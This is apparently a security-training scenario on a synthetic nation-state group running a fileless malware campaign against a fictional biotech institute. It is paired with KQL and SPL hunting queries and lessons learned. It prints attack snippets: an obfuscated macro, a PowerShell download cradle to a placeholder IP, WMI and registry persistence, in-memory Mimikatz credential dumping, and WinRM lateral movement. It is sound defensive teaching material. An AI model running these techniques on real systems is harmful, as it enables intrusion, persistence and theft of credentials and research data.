SC-044: Fileless Malware Campaign¶

Threat Actor Profile¶

PHANTOM CODE is a synthetic nation-state advanced persistent threat group targeting biotech and pharmaceutical research institutions. The group's distinguishing characteristic is a strict "nothing on disk" operational philosophy — every stage of their attack chain operates entirely in memory, using legitimate system tools (PowerShell, WMI, WinRM) and storing persistent payloads in the Windows Registry rather than the filesystem.

PHANTOM CODE's fileless approach is designed to evade:

• Signature-based antivirus: No malicious files on disk to scan
• File-based EDR detections: No new executables, DLLs, or scripts written to the filesystem
• Forensic analysis: Traditional disk forensics finds no artifacts — memory forensics is required
• Application whitelisting: All execution occurs through trusted system binaries (LOLBins)

The group operates in campaigns lasting 3–6 months, maintaining persistent access through registry-stored payloads that are loaded into memory by legitimate Windows processes at startup.

Motivation: Strategic intelligence collection — theft of biotech research data including drug formulations, clinical trial data, gene therapy research, and proprietary laboratory processes.

Scenario Narrative¶

Phase 1 — Spear Phishing & Initial PowerShell Cradle (~30 min)¶

Citadel Research Institute (CRI) is a synthetic biotech research firm with 800 employees, conducting research in gene therapy, mRNA vaccine development, and personalized medicine. CRI operates a Windows-dominant environment with Active Directory, Microsoft 365, and a mix of on-premises and Azure cloud infrastructure. Their research data is stored on on-premises file servers and in Azure Blob Storage.

PHANTOM CODE targets CRI after identifying it through open-source intelligence as a leader in gene therapy research. The attack begins with a highly targeted spear phishing email sent to Dr. James Okoro, Director of Gene Therapy Research:

Subject: "Nature Biotechnology — Reviewer Invitation: Gene Therapy Efficacy Meta-Analysis" Sender: editorial@nature-biotech-review.example.com Attachment: NatureBiotech_ReviewerPacket_2026.docm (macro-enabled Word document)

The document contains a VBA macro that executes a PowerShell download cradle. The macro is obfuscated using string concatenation and environment variable abuse to evade static analysis:

' Synthetic VBA — educational representation only
' DO NOT use in any real environment
Sub AutoOpen()
    Dim cmd As String
    cmd = "pow" & "ersh" & "ell -nop -w hidden -enc "
    cmd = cmd & "[Base64EncodedPayload]"
    Shell cmd, vbHide
End Sub

The PowerShell download cradle retrieves a second-stage PowerShell script from 198.51.100.120 and executes it entirely in memory — nothing is written to disk:

# Synthetic — educational representation only
# Stage 1: Download cradle (runs in memory)
IEX (New-Object Net.WebClient).DownloadString('https://198.51.100.120/update.ps1')

# Stage 2: update.ps1 (runs in memory, never saved to disk)
# - Disables AMSI (Antimalware Scan Interface) via memory patching
# - Loads reflective DLL into current PowerShell process
# - Establishes WMI-based persistence
# - Begins C2 communication via HTTPS to 203.0.113.200

The key characteristic of this attack: at no point does a malicious file touch the disk. The VBA macro launches PowerShell, which downloads and executes code in memory. The Word document itself is the only file — and macros are a legitimate (if risky) feature of Office documents.

Evidence Artifacts:

Phase 2 — WMI Persistence & Registry-Stored Payload (~35 min)¶

PHANTOM CODE establishes persistence using two complementary fileless techniques: WMI event subscriptions and registry-stored payloads.

Persistence Mechanism 1 — WMI Event Subscription:

The attacker creates a WMI event subscription that triggers a PowerShell command every time the system starts. This is a permanent WMI event subscription (survives reboots) that requires no files on disk:

# Synthetic — educational representation only
# WMI event subscription for persistence
# Event Filter: triggers on system startup
$Filter = Set-WmiInstance -Namespace "root\subscription" `
    -Class __EventFilter -Arguments @{
        Name = "SystemCoreUpdateFilter"
        EventNamespace = "root\cimv2"
        QueryLanguage = "WQL"
        Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
    }

# Event Consumer: executes PowerShell to load payload from registry
$Consumer = Set-WmiInstance -Namespace "root\subscription" `
    -Class CommandLineEventConsumer -Arguments @{
        Name = "SystemCoreUpdateConsumer"
        CommandLineTemplate = "powershell.exe -nop -w hidden -c `"IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String((Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate' -Name 'UpdatePayload').UpdatePayload)))`""
    }

Persistence Mechanism 2 — Registry-Stored Payload:

The actual malware payload (a PowerShell script) is base64-encoded and stored in a registry value. The registry key is chosen to blend in with legitimate Windows certificate update entries:

Registry Key:  HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Value Name:    UpdatePayload
Value Type:    REG_SZ
Value Data:    [Base64-encoded PowerShell payload — approximately 120KB]

When the WMI event triggers (system startup), it reads the registry value, base64-decodes it, and executes the PowerShell payload entirely in memory. The payload:

1. Patches AMSI to prevent PowerShell script scanning
2. Loads a reflective C# assembly into the PowerShell process (in-memory .NET execution)
3. Establishes HTTPS C2 to 203.0.113.200 with encrypted beacon traffic
4. Implements keylogging, screenshot capture, and file enumeration capabilities

Evidence Artifacts:

Phase 3 — In-Memory Credential Harvesting & Lateral Movement (~35 min)¶

Operating entirely in memory, PHANTOM CODE harvests credentials and moves laterally using only built-in Windows tools.

Credential Harvesting — In-Memory Mimikatz:

The attacker loads a reflective version of Mimikatz directly into the PowerShell process memory. No DLL is written to disk — the entire tool runs as a .NET assembly loaded via System.Reflection.Assembly.Load():

# Synthetic — educational representation only
# Reflective Mimikatz loading (in-memory, no disk artifact)
$bytes = [Convert]::FromBase64String($encodedMimikatz)
$assembly = [System.Reflection.Assembly]::Load($bytes)
$assembly.GetType("Mimikatz.Program").GetMethod("Main").Invoke($null, @(,"sekurlsa::logonpasswords"))

Harvested credentials from CRI-RES-JOKORO:

Lateral Movement — WinRM (PowerShell Remoting):

Using the harvested admin-ws credentials (shared local admin), PHANTOM CODE moves laterally to 5 additional research workstations via WinRM. WinRM is a legitimate Windows management protocol and is enabled by default on domain-joined workstations:

# Synthetic — educational representation only
# Lateral movement via WinRM (legitimate Windows tool)
$cred = New-Object PSCredential("admin-ws", $securePassword)
Invoke-Command -ComputerName "CRI-RES-MCHEN" -Credential $cred -ScriptBlock {
    # Load payload from registry of source machine via SMB, execute in memory
    IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String(
        (Get-ItemProperty -Path '\\CRI-RES-JOKORO\C$\...\AutoUpdate' -Name 'UpdatePayload').UpdatePayload
    )))
}

Compromised hosts after lateral movement:

Evidence Artifacts:

Phase 4 — Data Exfiltration via Encrypted HTTPS (~25 min)¶

PHANTOM CODE exfiltrates research data using HTTPS to blend with legitimate web traffic. The exfiltration tool is a PowerShell function loaded in memory that:

1. Reads target files from the file server (CRI-FS01)
2. Compresses and encrypts the data using AES-256 (key embedded in the in-memory payload)
3. Splits the encrypted data into 512KB chunks
4. Uploads chunks via HTTPS POST to 203.0.113.200/api/telemetry/upload — designed to look like application telemetry

Target data identified and exfiltrated:

Total data exfiltrated: 3.5GB (compressed and encrypted to 1.8GB), transmitted over 14 days at approximately 130MB/day to avoid bandwidth anomaly alerts.

Evidence Artifacts:

Detection & Hunting¶

KQL Detection Queries¶

// Detect PowerShell spawned by WmiPrvSE (WMI persistence execution)
DeviceProcessEvents
| where TimeGenerated > ago(24h)
| where InitiatingProcessFileName =~ "WmiPrvSE.exe"
| where FileName =~ "powershell.exe" or FileName =~ "pwsh.exe"
| project TimeGenerated, DeviceName, InitiatingProcessFileName,
          FileName, ProcessCommandLine, AccountName

// Detect AMSI bypass attempts
DeviceEvents
| where TimeGenerated > ago(24h)
| where ActionType == "AmsiUninitialize" or ActionType == "TamperingAttempt"
| where AdditionalFields has "AmsiScanBuffer" or AdditionalFields has "amsi.dll"
| project TimeGenerated, DeviceName, ActionType, FileName, AccountName

// Detect registry-stored payloads — large REG_SZ values in suspicious keys
DeviceRegistryEvents
| where TimeGenerated > ago(7d)
| where ActionType == "RegistryValueSet"
| where RegistryKey has "SystemCertificates" or RegistryKey has "CurrentVersion\\Run"
| where RegistryValueType == "String" or RegistryValueType == "ExpandString"
| extend ValueSize = strlen(RegistryValueData)
| where ValueSize > 10000
| project TimeGenerated, DeviceName, RegistryKey, RegistryValueName, ValueSize, AccountName

// Detect LSASS memory access by PowerShell
DeviceProcessEvents
| where TimeGenerated > ago(24h)
| where FileName =~ "powershell.exe"
| join kind=inner (
    DeviceEvents
    | where ActionType == "OpenProcess"
    | where AdditionalFields has "lsass"
) on DeviceId, TimeGenerated
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine, AccountName

// Detect WinRM lateral movement — multiple hosts in short time
DeviceLogonEvents
| where TimeGenerated > ago(24h)
| where LogonType == "Network"
| where InitiatingProcessFileName =~ "wsmprovhost.exe"
| summarize TargetHosts = dcount(DeviceName),
            HostList = make_set(DeviceName) by AccountName, bin(TimeGenerated, 1h)
| where TargetHosts > 3

SPL Detection Queries¶

// Detect WMI persistence — PowerShell spawned by WmiPrvSE
index=edr sourcetype=process_create
| where parent_process_name="WmiPrvSE.exe" AND (process_name="powershell.exe" OR process_name="pwsh.exe")
| table _time, host, parent_process_name, process_name, command_line, user

// Detect large registry values (potential payload storage)
index=sysmon sourcetype=sysmon EventCode=13
| where TargetObject="*SystemCertificates*" OR TargetObject="*CurrentVersion\\Run*"
| eval value_len=len(Details)
| where value_len > 10000
| table _time, host, TargetObject, value_len, User

// Detect LSASS access by PowerShell
index=sysmon sourcetype=sysmon EventCode=10
| where TargetImage="*lsass.exe" AND SourceImage="*powershell.exe"
| table _time, host, SourceImage, TargetImage, GrantedAccess, User

// Detect WinRM lateral movement pattern
index=wineventlog sourcetype=WinEventLog:Security EventCode=4624 Logon_Type=3
| where Process_Name="*wsmprovhost*"
| bin _time span=1h
| stats dc(dest) as unique_targets, values(dest) as targets by src, Account_Name, _time
| where unique_targets > 3
| table _time, src, Account_Name, unique_targets, targets

// Detect after-hours HTTPS uploads from workstations
index=proxy sourcetype=proxy_logs action=POST
| eval hour=strftime(_time, "%H")
| where hour >= 23 OR hour <= 4
| stats sum(bytes_out) as total_upload, count as request_count by src_ip, dest_host
| where total_upload > 50000000
| sort -total_upload

Indicators of Compromise (IOCs)¶

Full Attack Timeline¶

Lessons Learned¶

Critical Failures¶

1. No memory-based detection capability: CRI's antivirus was entirely file-based. Fileless malware operating in memory was invisible. Organizations need EDR solutions with memory scanning, AMSI integration, and behavioral detection — not just file signature matching.

2. Shared local admin passwords: All workstations used the same local admin password (admin-ws). Compromising one hash gave the attacker access to all workstations. LAPS (Local Admin Password Solution) would have assigned unique passwords to each workstation.

3. WMI persistence not monitored: WMI event subscriptions are a well-known persistence mechanism but CRI had no monitoring for WMI repository changes. Sysmon with appropriate configuration would have detected this.

4. No registry anomaly detection: A 121KB value stored in a certificate-related registry key is highly anomalous but went undetected. Registry monitoring rules should flag unusually large values in sensitive keys.

5. Macro-enabled documents allowed without controls: Macro-enabled Office documents were permitted without additional controls (no ASR rules, no macro signing, no sandboxing). Attack Surface Reduction rules for Office macro child processes would have blocked the initial execution chain.

6. No TLS inspection: Encrypted HTTPS exfiltration was invisible to the IDS. Without TLS inspection, organizations cannot detect data exfiltration, C2 communication, or malicious downloads within encrypted traffic.

Recommended Controls¶

Cross-References¶

• Chapter 18: Malware Analysis — Fileless malware techniques, memory forensics, and behavioral analysis
• Chapter 38: Threat Hunting Advanced — Hunting for LOLBins, PowerShell abuse, and WMI persistence
• Chapter 48: Exploit Development Concepts — In-memory execution, reflective DLL injection, and AMSI bypass techniques